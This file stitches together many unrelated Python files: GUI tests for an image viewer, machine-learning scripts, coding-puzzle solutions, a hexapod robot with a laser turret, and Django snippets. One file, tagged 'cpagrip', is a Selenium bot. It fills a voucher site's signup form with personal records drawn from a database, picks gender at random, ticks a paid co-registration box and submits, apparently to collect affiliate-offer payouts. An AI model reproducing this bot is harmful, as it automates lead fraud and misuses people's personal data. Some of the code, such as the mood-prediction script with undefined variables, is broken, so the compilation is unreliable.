self.model.red_model.alpha_value = 75
self.model.green_model.alpha_value = 50
self.model.blue_model.alpha_value = 25
assert self.model.alphas == [.75, .5, .25]
class TestChannelDialogController(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
model = channels_dialog.ChannelsDialogModel(window)
controller = channels_dialog.ChannelsDialogController(model, None)
def test_init(self):
assert self.controller.model == self.model
assert self.controller.view is None
def test_update_menus_indices(self):
assert self.model.menu_indices == [0, 1, 2]
self.model.red_model.update_index(1)
self.model.green_model.update_index(3)
self.model.blue_model.update_index(0)
assert self.model.menu_indices == [0, 1, 2]
self.controller.update_menu_indices()
assert self.model.menu_indices == [1, 3, 0]
def test_update_current_index(self):
assert self.model.current_index == 0
self.model.main_window.controller.next_image()
assert self.model.current_index == 0
self.controller.update_current_index()
assert self.model.current_index == 1
self.model.main_window.controller.previous_image()
assert self.model.current_index == 1
self.controller.update_current_index()
assert self.model.current_index == 0
class TestChannelsDialog(object):
test_images = pdsview.ImageSet(test_files)
window = pdsview.PDSViewer(test_images)
window.channels_dialog()
dialog = window.channels_window
model = dialog.model
window.show()
def add_widget_wrapper(func):
@wraps(func)
def wrapper(self, qtbot):
self.dialog.show()
qtbot.addWidget(self.dialog)
return func(self, qtbot)
return wrapper
@add_widget_wrapper
def test_init(self, qtbot):
assert self.dialog.model == self.model
assert self.dialog in self.model._views
assert isinstance(
self.dialog.controller, channels_dialog.ChannelsDialogController
)
assert isinstance(self.dialog, QtWidgets.QDialog)
assert isinstance(self.dialog.image_tree, QtWidgets.QTreeWidget)
for item in self.dialog.items:
assert isinstance(item, QtWidgets.QTreeWidgetItem)
selection_mode = QtWidgets.QAbstractItemView.NoSelection
assert self.dialog.image_tree.selectionMode() == selection_mode
assert self.model.image_names == [
item.text(0) for item in self.dialog.items]
assert self.dialog.current_item.isSelected()
assert isinstance(self.dialog.rgb_check_box, QtWidgets.QCheckBox)
assert isinstance(self.dialog.red_widget, band_widget.BandWidget)
assert isinstance(self.dialog.green_widget, band_widget.BandWidget)
assert isinstance(self.dialog.blue_widget, band_widget.BandWidget)
@add_widget_wrapper
def test_current_item(self, qtbot):
assert self.dialog.current_item.text(0) == self.dialog.items[0].text(0)
qtbot.mouseClick(self.window.next_image_btn, QtCore.Qt.LeftButton)
assert self.model.current_index == 1
assert self.dialog.current_item.text(0) == self.dialog.items[1].text(0)
qtbot.mouseClick(self.window.previous_image_btn, QtCore.Qt.LeftButton)
assert self.model.current_index == 0
assert self.dialog.current_item.text(0) == self.dialog.items[0].text(0)
# TODO: CANNOT TEST RGB UNTIL AN RGB IMAGE IS ADDED TO THE TEST DATA
# @add_widget_wrapper
# def test_check_rgb(self, qtbot)
@add_widget_wrapper
def test_change_image(self, qtbot):
def check_selected(index1, index2):
assert self.dialog.items[index1].isSelected()
assert not self.dialog.items[index2].isSelected()
check_selected(0, 1)
qtbot.mouseClick(self.window.next_image_btn, QtCore.Qt.LeftButton)
check_selected(1, 0)
qtbot.mouseClick(self.window.previous_image_btn, QtCore.Qt.LeftButton)
check_selected(0, 1)
qtbot.mouseClick(self.window.previous_image_btn, QtCore.Qt.LeftButton)
check_selected(-1, 0)
qtbot.mouseClick(self.window.next_image_btn, QtCore.Qt.LeftButton)
check_selected(0, 1)
@add_widget_wrapper
def test_set_menus_index(self, qtbot):
widgets = [
self.dialog.red_widget,
self.dialog.green_widget,
self.dialog.blue_widget
]
def check_currentIndex():
for widget, index in zip(widgets, self.model.menu_indices):
assert widget.menu.currentIndex() == index
self.model.menu_indices = [0, 1, 2]
self.dialog.set_menus_index()
check_currentIndex()
r, g, b = 4, 0, 2
self.model.menu_indices = [r, g, b]
self.dialog.set_menus_index()
check_currentIndex()
self.model.menu_indices = [0, 1, 2]
self.dialog.set_menus_index()
check_currentIndex()
assert self.model.menu_indices == [0, 1, 2]
@add_widget_wrapper
def test_update_menus_current_item(self, qtbot):
assert self.test_images.rgb == self.model.images[:3]
r, g, b = 4, 0, 2
new_rgb = [
self.model.images[r], self.model.images[g], self.model.images[b]
]
self.test_images.rgb = new_rgb
self.dialog.update_menus_current_item()
assert self.model.red_model.index == r
assert self.model.green_model.index == g
assert self.model.blue_model.index == b
red_text = self.dialog.red_widget.menu.currentText()
assert red_text == self.model.image_names[r]
green_text = self.dialog.green_widget.menu.currentText()
assert green_text == self.model.image_names[g]
blue_text = self.dialog.blue_widget.menu.currentText()
assert blue_text == self.model.image_names[b]
self.test_images.rgb = self.model.images[:3]
assert self.test_images.rgb == self.model.images[:3]
@add_widget_wrapper
def test_close_dialog(self, qtbot):
assert not self.window.channels_window_is_open
qtbot.mouseClick(self.window.channels_button, QtCore.Qt.LeftButton)
assert self.window.channels_window_is_open
pos = self.dialog.pos()
x, y = pos.x(), pos.y()
new_pos = QtCore.QPoint(x + 5, y - 10)
self.dialog.move(new_pos)
qtbot.mouseClick(self.dialog.close_button, QtCore.Qt.LeftButton)
assert not self.window.channels_window_is_open
assert self.window.channels_window_pos == new_pos
qtbot.mouseClick(self.window.channels_button, QtCore.Qt.LeftButton)
assert self.window.channels_window_is_open
assert self.dialog.pos() == new_pos
|
import pandas as pd
import sys
import numpy as np
import sklearn
from sklearn.tree import DecisionTreeRegressor
pd.set_option('display.max_rows', 11000)
np.set_printoptions(threshold=np.inf)
from sklearn.ensemble import AdaBoostRegressor,ExtraTreesRegressor,BaggingRegressor,RandomForestRegressor
gdptest = pd.read_csv(sys.argv[1],names=['Country Name','year','gdpvalue'])
def meltfile(file,valuename):
f = pd.read_csv(file)
aftermelt = pd.melt(f,id_vars=['Country Name'])
docu = aftermelt.rename(columns={'variable':'year', 'value':valuename})
return docu
life = meltfile('life expectancy by country and year.csv','lifevalue')
gdp = meltfile('GDP by country and year.csv','gdpvalue')
def impute(file,valuename):
file[valuename] = file.groupby(['Country Name'])[valuename].fillna(method = 'ffill')
file[valuename] = file.groupby(['Country Name'])[valuename].fillna(method = 'bfill')
file[valuename] = file.groupby("year").transform(lambda x: x.fillna(x.mean()))
impute(gdp,'gdpvalue')
impute(life,'lifevalue')
impute(gdptest,'gdpvalue')
gl = pd.merge(life, gdp,on=['Country Name', 'year'])
gl['year'] = gl['year'].astype('int')
get_dummy = pd.get_dummies(gl['Country Name'])
frames = [get_dummy,gl]
gl = pd.concat(frames,axis=1)
match = gl.iloc[:,:-3]
match = match.drop_duplicates('Country Name')
gettestdummy = gdptest.merge(gdptest.merge(match,how = 'left',on=['Country Name'],sort = False),sort=False)
cols = list(gettestdummy.columns.values)
cols.pop(cols.index('Country Name'))
cols.pop(cols.index('year'))
cols.pop(cols.index('gdpvalue'))
gettestdummy = gettestdummy[cols+['Country Name','year','gdpvalue']]
train_x = gl.drop(['Country Name','gdpvalue','lifevalue'],axis = 1)
train_y = gl['lifevalue']
test_x = gettestdummy.drop(['Country Name', 'gdpvalue'],axis = 1)
# estimators = 10
# regressor = RandomForestRegressor(n_estimators=estimators)
# regressor.fit(train_x, train_y)
# predicted_y = regressor.predict(test_x)
# treereg = DecisionTreeRegressor(criterion='mse')
# treereg.fit(train_x, train_y)
# predtree_y = treereg.predict(test_x)
# print np.mean(sklearn.cross_validation.cross_val_score(treereg,
# train_x, train_y,cv = 10,scoring = 'mean_squared_error'))
estimators = 10
treereg = ExtraTreesRegressor(n_estimators=estimators)
treereg.fit(train_x, train_y)
predtree_y = treereg.predict(test_x)
with open (sys.argv[2],'w') as f:
for i in range(len(predtree_y)):
f.write(str(predtree_y[i])+'\n')
|
'''
cpagrip
Get the Best Nutella Package!
http://zh.moneymethods.net/click.php?c=7&key=bbcprqa35ns2a5f44z14k2k3
Uspd
'''
from selenium import webdriver
from time import sleep
# import xlrd
import random
import os
import time
import sys
sys.path.append("..")
# import email_imap as imap
# import json
import re
# from urllib import request, parse
from selenium.webdriver.support.ui import Select
# import base64
import Chrome_driver
import email_imap as imap
import name_get
import db
import selenium_funcs
import Submit_handle
import random
def web_submit(submit,chrome_driver,debug=0):
# test
if debug == 1:
site = 'http://lub.lubetadating.com/c/13526/1?clickid=[clickid]&bid=[bid]&siteid=[siteid]&countrycode=[cc]&operatingsystem=[operatingsystem]&campaignid=[campaignid]&category=[category]&connection=[connection]&device=[device]&browser=[browser]&carrier=[carrier]'
submit['Site'] = site
chrome_driver.get(submit['Site'])
chrome_driver.maximize_window()
chrome_driver.refresh()
# sleep(2000)
# chrome_driver.find_element_by_xpath('').click()
# chrome_driver.find_element_by_xpath('').send_keys(submit['Uspd']['state'])
if 'https://vouchersavenue.com/' not in chrome_driver.current_url:
print('Url wrong!!!!!!!!!!!!!!!!!')
chrome_driver.close()
chrome_driver.quit()
return 0
# mrs mr
num_gender = random.randint(0,1)
if num_gender == 0:
chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[1]/div/div[1]/label').click()
else:
chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[1]/div/div[2]/label').click()
# chrome_driver.find_element_by_xpath().click()
# firstname
chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[2]/input').send_keys(submit['Uspd']['first_name'])
# lastname
chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[3]/input').send_keys(submit['Uspd']['last_name'])
# address
chrome_driver.find_element_by_xpath('//*[@id="address"]').send_keys(submit['Uspd']['address'])
# zipcode
zipcode = Submit_handle.get_zip(submit['Uspd']['zip'])
print('zipcode:',zipcode)
for key in zipcode:
chrome_driver.find_element_by_xpath('//*[@id="postal_code"]').send_keys(int(key))
# city
chrome_driver.find_element_by_xpath('//*[@id="locality"]').send_keys(submit['Uspd']['city'])
# state
s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[7]/select'))
s1.select_by_value(submit['Uspd']['state'])
# email
chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[8]/input').send_keys(submit['Uspd']['email'])
# cellphone
cellphone = Submit_handle.chansfer_float_into_int(submit['Uspd']['home_phone'])
print('cellphone:',cellphone)
for key in cellphone:
chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[9]/input').send_keys(int(key))
date_of_birth = Submit_handle.get_auto_birthday(submit['Uspd']['date_of_birth'])
# MM
s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="month"]'))
s1.select_by_value(date_of_birth[0])
# DD
s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="day"]'))
s1.select_by_value(date_of_birth[1])
# Year
s1 = Select(chrome_driver.find_element_by_xpath('//*[@id="year"]'))
s1.select_by_value(date_of_birth[2])
sleep(5)
# i agree
element = selenium_funcs.scroll_and_find_up(chrome_driver,'//*[@id="signupForm"]/div[12]/label/input')
element.click()
# sleep(2)
try:
# get paid
element = selenium_funcs.scroll_and_find_up(chrome_driver,'//*[@id="signup_coreg"]/div/div/label/input[1]')
element.click()
except:
pass
# chrome_driver.find_element_by_xpath('').click()
# chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/div[12]/label/input').click()
# continue
chrome_driver.find_element_by_xpath('//*[@id="signupForm"]/button').click()
sleep(30)
chrome_driver.refresh()
sleep(5)
chrome_driver.close()
chrome_driver.quit()
return 1
def test():
Mission_list = ['10000']
Excel_name = ['Uspd','']
Email_list = ['hotmail.com','outlook.com','yahoo.com','aol.com','gmail.com']
submit = db.read_one_excel(Mission_list,Excel_name,Email_list)
# print(submit)
# date_of_birth = Submit_handle.get_auto_birthday(submit['Uspd']['date_of_birth'])
# print(date_of_birth)
web_submit(submit,1)
# print(submit['Uspd'])
# print(submit['Uspd']['state'])
# print(submit['Uspd']['city'])
# print(submit['Uspd']['zip'])
# print(submit['Uspd']['date_of_birth'])
# print(submit['Uspd']['ssn'])
def test1():
num_gender = random.randint(0,1)
print(num_gender)
if __name__=='__main__':
test()
print('......')
|
import os
import time
import requests
import random
from slackclient import SlackClient
from pyquery import PyQuery
if __name__ == "__main__":
pre_url = 'http://www.guru3d.com/'
url = 'http://www.guru3d.com/files-categories/videocards-nvidia-geforce-vista-%7C-7.html'
headers = {'user-agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0"}
forum_page = requests.get(url, headers=headers).content
pq = PyQuery(forum_page)
first_post_title = pq("h1")[0]
driver_version = first_post_title.text_content().split('driver')[0].strip()
page_url = pre_url + first_post_title.getnext().getnext().find('a').get('href')
|
w = int(input())
seed = 1
for j in range(1,w+1):
seed = seed * j
print (seed)
|
# -*- coding: ms949 -*-
import pandas as pd
from sklearn.model_selection._split import train_test_split
from sklearn.linear_model.logistic import LogisticRegression
data = pd.read_csv("diabetes.csv",
header=None,
names=['1st','2nd','3rd','4th','5th','6th','7th','8th','result'])
print(data.head())
X = data[['1st','2nd','3rd','4th','5th','6th','7th','8th']]
y = data['result']
X_train, X_test, y_train, y_test = train_test_split(X, y,
test_size=.25,
random_state=20)
lr = LogisticRegression()
lr.fit(X_train, y_train)
print(lr.predict(X_test[0:10]))
print(lr.score(X_test, y_test))
|
from graphgallery.backend import *
from graphgallery.data_type import *
# modules
from graphgallery import nn
from graphgallery import backend
from graphgallery import gallery
from graphgallery import utils
from graphgallery import sequence
from graphgallery import data
from graphgallery import datasets
from graphgallery import functional
from graphgallery import attack
from .version import __version__
__all__ = [
"graphgallery", "nn", "gallery", "utils", "sequence", "data", "datasets",
"backend", "functional", "attack", "__version__"
]
|
import argparse, textwrap
import os
import time
import numpy as np
import leg
from adafruit_servokit import ServoKit
import path_scaling as ps
import socket
link_x, link_y, laser_x, laser_y = 0, 0, 0, 0
head_turn = False
init_body_turn, travel_distance, theta = 0, 0, 0
# Movement state globals
MOVE_FORWARD = False
MOVE_BACKWARD = False
TURN_LEFT = False
TURN_RIGHT = False
orientation_back = False
current_position = 0.0
current_angle = 0
kit1 = ServoKit(channels=16,address=0x40)
kit2 = ServoKit(channels=16,address=0x41)
# Prameters for the legs
FIRST_SEG_LEN = 0
SECOND_SEG_LEN = 0
THIRD_SEG_LEN = 0
num_legs = 6
x_offset = 0
y_radius = 0
z_radius = 0
y_offset = 0
z_offset = 0
base_locs = []
base_angs = []
positions = []
legs = []
angs = []
# Turret parameters
L0 = 82.5
R0 = 77.5
L = L0
R = R0
laser_pos = 0
R_CW = np.array([[np.cos(45*np.pi/180), -np.sin(45*np.pi/180)], [np.sin(45*np.pi/180), np.cos(45*np.pi/180)]])
def resetData():
global link_x, link_y, laser_x, laser_y
global head_turn, init_body_turn, travel_distance, theta
link_x = 0
link_y = 0
laser_x = 0
laser_y = 0
init_body_turn = 0
travel_distance = 0
theta = 0
# Sample Position Input would look like "Position - Link: 152,156. Laser: 142,138"
def updatePosition(pos_data):
global link_x, link_y, laser_x, laser_y
pos_data = pos_data[11:]
link_data = pos_data.split(". ")[0]
link_coords = link_data.split(": ")[1]
link_x = int(link_coords.split(",")[0])
link_y = int(link_coords.split(",")[1])
laser_data = pos_data.split(". ")[1]
laser_coords = laser_data.split(": ")[1]
laser_x = int(laser_coords.split(",")[0])
laser_y = int(laser_coords.split(",")[1])
# Sample Motion Input would look like "Motion - Body_Turn: -12, Distance: 7, Theta: 45" or "Motion - ON" or "Motion - OFF"
def updateMotion(motion_data):
global head_turn, init_body_turn, travel_distance, theta
motion_data = motion_data[9:]
if "ON" in motion_data:
head_turn = True
elif "OFF" in motion_data:
head_turn = False
else:
motion_data = motion_data.replace(" ", "")
data_list = motion_data.split(",")
init_body_turn = float(data_list[0].split(":")[1])
travel_distance = float(data_list[1].split(":")[1])
theta = int(data_list[2].split(":")[1])
def parse_arguments():
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)
# segment lengths are cm
parser.add_argument("--seg1_len",dest="seg1_len",type=float,default=3.9,help="length of 1st seg (cloest to body)")
parser.add_argument("--seg2_len",dest="seg2_len",type=float,default=7.75,help="length of 2nd seg (middle)")
parser.add_argument("--seg3_len",dest="seg3_len",type=float,default=12.8,help="length of 3rd seg (farthest from body)")
parser.add_argument("--x_offset",dest="x_offset",type=float,default=10)
parser.add_argument("--y_radius",dest="y_radius",type=float,default=4)
parser.add_argument("--z_radius",dest="z_radius",type=float,default=5)
parser.add_argument("--y_offset",dest="y_offset",type=float,default=0)
parser.add_argument("--z_offset",dest="z_offset",type=float,default=-16)
parser.add_argument("--z_offset_heights",dest="z_offset_heights",type=list,default=[0,0,0,0,0,0])
return parser.parse_args()
# Used for printing the angle of every joint
def print_angs(num_legs,angs):
for i in range(num_legs):
print("Leg ",i)
print(angs[i])
print("")
# Used for updating the servo angles through the servo hat
def update_angs(num_legs,angs):
'''
for (i) in range(num_legs):
kit.servo[3*i+0].angle = angs[i][0]
kit.servo[3*i+1].angle = angs[i][1]
kit.servo[3*i+2].angle = angs[i][2]+90
'''
hat_map = [1,1,1,2,2,2]
pin_map =[[0,1,2],[3,4,5],[6,7,8],[7,8,9],[10,11,12],[13,14,15]]
for i in range(0,num_legs):
#angs[5][1] = angs[5][1] - 5
if (hat_map[i] == 1):
for p,s in zip(pin_map[i],[0,1,2]):
if (s==2):
kit1.servo[p].angle = angs[i][s]+90
else:
kit1.servo[p].angle = angs[i][s]
else:
for p,s in zip(pin_map[i],[0,1,2]):
if (s==2):
kit2.servo[p].angle = angs[i][s]+90
else:
kit2.servo[p].angle = angs[i][s]
def init_legs(args):
global x_offset, y_radius, z_radius, y_offset, z_offset, base_locs, base_angs, positions, legs, num_legs, angs
FIRST_SEG_LEN = args.seg1_len
SECOND_SEG_LEN = args.seg2_len
THIRD_SEG_LEN = args.seg3_len
x_offset = args.x_offset
y_radius = args.y_radius
z_radius = args.z_radius
y_offset = args.y_offset
z_offset = args.z_offset
z_offset_heights = args.z_offset_heights
base_locs = []
base_angs = []
angle_inc = 2*np.pi/num_legs
for i in range(num_legs):
base_angs.append(i*angle_inc)
base_locs.append([1*np.cos(base_angs[i]),-1*np.sin(base_angs[i]),0])
k = 19;
num_points = k;
for t in range(0,8):
positions.append([x_offset, y_radius*np.cos(-1*t/(8-1)*np.pi/2-np.pi/2)+y_offset, z_offset])
for t in range(0,3):
positions.append([x_offset, y_radius*np.cos(-1*t/(3-1)*np.pi-np.pi)+y_offset, z_radius*np.sin(-1*t/(5-1)*np.pi-np.pi)+z_offset])
for t in range(0,8):
positions.append([x_offset, y_radius*np.cos(-1*t/(8-1)*np.pi/2)+y_offset, z_offset])
legs = []
for (i,b_loc,b_ang) in zip(range(num_legs),base_locs,base_angs):
if i%2 == 1:
if num_legs == 6:
step_offset = 0.5
else:
step_offset = 0
else:
step_offset = 0
legs.append(leg.leg(num_segs=3,lens=[FIRST_SEG_LEN,SECOND_SEG_LEN,THIRD_SEG_LEN],base_location=b_loc,base_angle=b_ang,positions=positions,forward_angle=b_ang,leg_ID=i,step_offset=step_offset,z_offset_height=z_offset_heights[i]))
angs = []
for l in legs:
angs.append(l.get_angles_deg(mode='servo')+90)
print_angs(num_legs,angs)
update_angs(num_legs,angs)
print("First leg path: after init")
print(legs[0].positions)
print("First leg forward angle: after init")
print(legs[0].forward_angle)
def init_laser():
set_laser_servos(L0,R0)
def move(init_body_turn, travel_distance, theta):
global current_position, legs, num_legs, angs, orientation_back
# Set movement state base on input string values
if current_position < travel_distance and np.abs(current_position-travel_distance) > 0.5:
MOVE_FORWARD = True
MOVE_BACKWARD = False
elif current_position > travel_distance and np.abs(current_position-travel_distance) > 0.5:
MOVE_FORWARD = False
MOVE_BACKWARD = True
else:
MOVE_FORWARD = False
MOVE_BACKWARD = False
current_position = 0
if theta < 0:
print("Turning right")
elif theta > 0:
print("Turning left")
for (l,i) in zip(legs,range(num_legs)):
l.turn(theta*np.pi/180)
if MOVE_FORWARD:
if not orientation_back:
for (l,i) in zip(legs,range(num_legs)):
l.step()
else:
for (l,i) in zip(legs,range(num_legs)):
l.reverse()
l.step()
orientation_back = False
current_position = current_position + 5/19*3/2
elif MOVE_BACKWARD:
if not orientation_back:
for (l,i) in zip(legs,range(num_legs)):
l.reverse()
l.step()
orientation_back = True
else:
for (l,i) in zip(legs,range(num_legs)):
l.step()
current_position = current_position - 5/19*3/2
for (l,k) in zip(legs,range(num_legs)):
angs[k] = l.get_angles_deg(mode='servo')+90
update_angs(num_legs,angs)
return ((not MOVE_FORWARD) and (not MOVE_BACKWARD))
def set_laser_servos(ang1,ang2):
kit1.servo[14].angle = ang1
kit1.servo[15].angle = ang2
def move_laser(link_x, link_y, laser_x, laser_y):
global L, R, laser_err
screen_dim_x = 960
screen_dim_y = 720
if link_x < 0:
link_x = screen_dim_x / 2
if link_y < 0:
link_y = screen_dim_y / 2
laser_err = [link_x-dim_x/2, link_y-dim_y/2]
laser_err = np.matmul(R_CW,laser_err)
dR = -laser_err[0]/screen_dim_x*(105-50)
dL = -laser_err[1]/screen_dim_y*(105-60)
R = R0 + dR
L = L0 + dL
edge = False
if R >= 105:
R = 105
edge = True
elif R <= 50:
R = 50
edge = True
if L >= 105:
L = 105
edge = True
elif L <= 60:
L = 60
edge = True
#print("L: ",L)
#print("R: ",R)
set_laser_servos(L,R)
return True
def client_program():
global theta
host = "192.168.0.101"
port = 5001
client_socket = socket.socket()
client_socket.connect((host, port))
while True:
message = client_socket.recv(1024).decode()
message = message.split("clean")[1]
print(message)
if (message[0:8] == "Position"):
updatePosition(message)
elif (message[0:6] == "Motion"):
updateMotion(message)
print("Position Data:", link_x, link_y, laser_x, laser_y)
print("Motion Data:", head_turn, init_body_turn, travel_distance, theta)
start_time = time.time()
if head_turn:
kit1.continuous_servo[13].throttle = 0.15
else:
kit1.continuous_servo[13].throttle = 0.05
while True:
move_legs_result = move(init_body_turn, travel_distance, theta)
theta = 0
move_laser_result = move_laser(link_x, link_y, laser_x, laser_y)
if (move_legs_result and move_laser_result):
break
"""
print("First leg path: after data")
print(legs[0].positions)
print("First leg forward angle: after data")
print(legs[0].forward_angle)
"""
resetData()
client_socket.close()
if __name__ == '__main__':
args = parse_arguments()
init_legs(args)
init_laser()
client_program()
|
#
# find resize partition in descriptor file
# return partition_number sector
#
import json
import sys
if len(sys.argv) != 2:
print "Descriptor file required"
exit(1)
desc = sys.argv[1]
with open(desc) as descfile:
data = json.load(descfile)
for p in data['partition']:
if p['resize'] == 'y':
print p['number'] + ' ' + p['sector']
exit(0)
print 'Resizeable partition not defined'
exit(1)
##
|
""" shoppinglist/views.py"""
from rest_framework import generics, response,reverse
from rest_framework.decorators import api_view
# Function based view to return an object with url to api
@api_view(['GET'])
def api_root(request, format=None):
return response.Response({
'shoppinglist': reverse.reverse('api:create_list', request=request, format=format),
})
|
# ****************************************************************** #
# ************************* Byte of Python ************************* #
# ****************************************************************** #
########################
# user_input
########################
# def reverse(text):
# return text[::-1]
# def is_palindrome(text):
# return text == reverse(text)
# something = input("Enter text: ")
# if is_palindrome(something):
# print("Yes, it is a palindrome")
# else:
# print("No, it is not a palindrome")
########################
# using_file
########################
# poem = """\
# Programming is fun
# When the work is done
# if you wanna make your work also fun:
# use Python!
# """
# # if poem.txt does not exist, then create it.
# f = open("poem.txt", "w")
# f.write(poem)
# f.close()
# f = open("poem.txt")
# while True:
# line = f.readline()
# if len(line) == 0:
# break
# print(line, end = "")
# f.close()
########################
# pickling
########################
# import pickle
# shoplistfile = "shoplist.data"
# shoplist = ["apple", "mango", "carrot"]
# f = open(shoplistfile, "wb")
# pickle.dump(shoplist, f) # dump the object to a file
# f.close()
# del shoplist # destroy the shoplist variable
# f = open(shoplistfile, "rb")
# storedlist = pickle.load(f) # load the object from the file
# print(storedlist)
########################
# unicode -- python2
########################
print(type("hello world"))
print(type(u"hello world"))
f = open("abc.txt", "wt", encoding = "utf-8")
f.write("中国")
f.close()
text = open("abc.txt", encoding = "utf-8").read()
print(text) |
class Solution(object):
def moveZeroes(self, nums):
num_of_zeroes = 0
for x in nums:
if x == 0: num_of_zeroes += 1
curr = 0
for i in range(len(nums)):
if nums[i] != 0:
nums[curr] = nums[i]
curr += 1
start = len(nums) - num_of_zeroes
for i in range(start, len(nums)):
nums[i] = 0
a = [0, 1, 0, 3, 12, 0, 22, 0]
Solution().moveZeroes(a)
print(a)
a = [0]
Solution().moveZeroes(a)
print(a)
a = []
Solution().moveZeroes(a)
print(a)
a = [1]
Solution().moveZeroes(a)
print(a) |
# -*- coding: utf-8 -*-
from collections import Counter
class Solution:
def majorityElement(self, nums):
return Counter(nums).most_common(1)[0][0]
if __name__ == "__main__":
solution = Solution()
assert 1 == solution.majorityElement([1])
assert 1 == solution.majorityElement([1, 1, 2])
|
import math
n , k = map(int,input().split())
arr = []
stor = []
for i in range(2,int(math.sqrt(n))+1,+1):
while n % i == 0:
n = n//i
arr.append(i)
if n >= 2:
arr.append(n)
if k > len(arr):
print(-1)
else:
for j in range(k-1):
print(arr[j],end=" ")
product = 1
for u in range(k-1,len(arr)):
product = product*arr[u]
print(product)
|
from error import UnAuthorizedUser
def auth_required(req, res, resource, param):
if req.get_header('Authorization') is None:
raise UnAuthorizedUser() |
from django.http import HttpResponse, JsonResponse
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Product
from .serializers import ProductSerializer
# Create your views here.
class ProductList(APIView):
def get(self, request):
data = Product.objects.all()
serialized = ProductSerializer(data, many=True)
return Response({'products': serialized.data})
def post(seft, request):
return Response({'products': request.data}) |
import math
import sys
import pandas as pd
from pandas.tools.plotting import autocorrelation_plot
import numpy as np
#from statsmodels.tsa.api import VAR
#from statsmodels.tsa.arima_model import ARIMA
#from sklearn.cross_validation import train_test_split
#from sklearn.tree import DecisionTreeClassifier
#from sklearn.metrics import accuracy_score
#from sklearn import tree
#import graphviz
##from keras.models import Sequential
##from keras.layers import Dense
#import matplotlib.pyplot as plt
'''
Takes the mean of the last k time-steps for attributes:
- mood
- arousal
- valence
- activity
- screen
Creates a training, validation and test set
'''
def categorise(x):
'''Rounds a number to nearest 0.5, then multiplies by 10 to get a category
value'''
return int(round(x*2)*5)
if __name__ == '__main__':
if len(sys.argv) == 2:
patient_num = int(sys.argv[1])
else:
patient_num = 1
mses = []
for i in range(1, 34):
# load patient data
try:
data = pd.read_csv(open('./summaries_cleaned/patient_{:02d}_summary.csv'.format(i),'rb'), index_col=0, parse_dates=True)
except:
continue
print('\n --- Patient {:02d} ---'.format(i))
p_data = data['mood']
p_data.rename(columns={'mood': 'next_mood'}, inplace=True)
p_data.rename(columns={p_data.columns[0]: 'next_mood'}, inplace=True)
p_data['next_mood'] = p_data['next_mood'].shift(-1)
p_data = p_data[:-1]
# split into training, validation and testing set
seg = [0.7, 0.1, 0.2]
t = len(p_data)
splits = [math.floor(seg[0]*t), math.floor((seg[0]+seg[1])*t)]
train = p_data[:splits[0]]
train2 = p_data[:splits[1]] # includes validation data
validate = p_data[splits[0]:splits[1]]
test = p_data[splits[1]:]
train_x, train_y = train.iloc[:, 1:], train['next_mood']
train2_x, train2_y = train2.iloc[:, 1:], train2['next_mood']
validate_x, validate_y = validate.iloc[:, 1:], validate['next_mood']
test_x, test_y = test.iloc[:, 1:], test['next_mood']
# --- Run Model Here on p_data ---
# MEAN PREDICTOR (Benchmark)
for t in range(len(test_x)):
square_errors = []
for j in range(len(predictions)):
print('Predicted: {}, observed: {}'.format(predictions[j], obs[j]))
square_errors.append((predictions[j] - obs[j])**2)
mse = np.mean(square_errors)
print('\nMSE: {}'.format(mse))
mses.append(mse)
print('\n\nAvg. MSE (all patients): {}'.format(np.mean(mses)))
|
'''
def f(x):
return 1/(1 + x**2)
sum = 0
h = 0.2
for i in range(1, 10):
print(f(-1 + i * h))
if i % 2:
sum += 2 * f(-1 + i * h)
else:
sum += 4 * f(-1 + i * h)
sum += 1
print('sum=',sum / 15)
'''
import math
def f(x):
return abs(x - 0.1996668333)
print(f(0.199008))
print(f(0.1995004))
print(f(0.1996252))
print(f(0.1996564))
print(f(0.1996642)) |
from disease_api import *
from medicine_api import *
from doctor_api import *
import endpoints
APPLICATION = endpoints.api_server([DoctorInfoApi,DiseaseInfoApi,MedicineInfoApi],
restricted=False)
|
""" """
import logging
import time
import sys
import utils
from models import experiment_dict
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split, cross_val_predict
logr = logging.getLogger(__name__)
logr.setLevel(logging.DEBUG)
sh = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter('%(asctime)s : %(name)s : %(levelname)s : %(message)s')
sh.setFormatter(formatter)
logr.addHandler(sh)
X_train_full, y_train_full = utils.import_training_data()
train_fraction = 0.8
X_train, X_test, y_train, y_test = train_test_split(X_train_full,
y_train_full,
test_size=train_fraction,
random_state=42)
print('X_train has shape {}'.format(X_train.shape))
print('y_train has shape {}'.format(y_train.shape))
def run_experiment(num):
start = time.time()
logr.info('Running Experiment num={}'.format(num))
target_model_name = 'expt_{}'.format(num)
expt = experiment_dict[target_model_name]
pipeline = expt['pl']
pipeline.fit(X_train, y_train)
cv = 3
predictions = cross_val_predict(pipeline, X_test, y_test, cv=cv)
logr.info('obtained accuracy = {:.2f}% with cv={}, pipeline={} '.format(
accuracy_score(y_test,predictions)*100,
cv,
pipeline))
taken = time.time() - start
logr.info('expt {} took {} seconds'.format(num, taken ))
for i in range(1, len(experiment_dict) + 1):
run_experiment(i)
|
"""empty message
Revision ID: 19c4b18cd911
Revises: 5ef7188ba1df
Create Date: 2019-05-26 19:46:22.004585
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '19c4b18cd911'
down_revision = '5ef7188ba1df'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_foreign_key(None, 'slots_db', 'users', ['doctorID'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'slots_db', type_='foreignkey')
# ### end Alembic commands ###
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
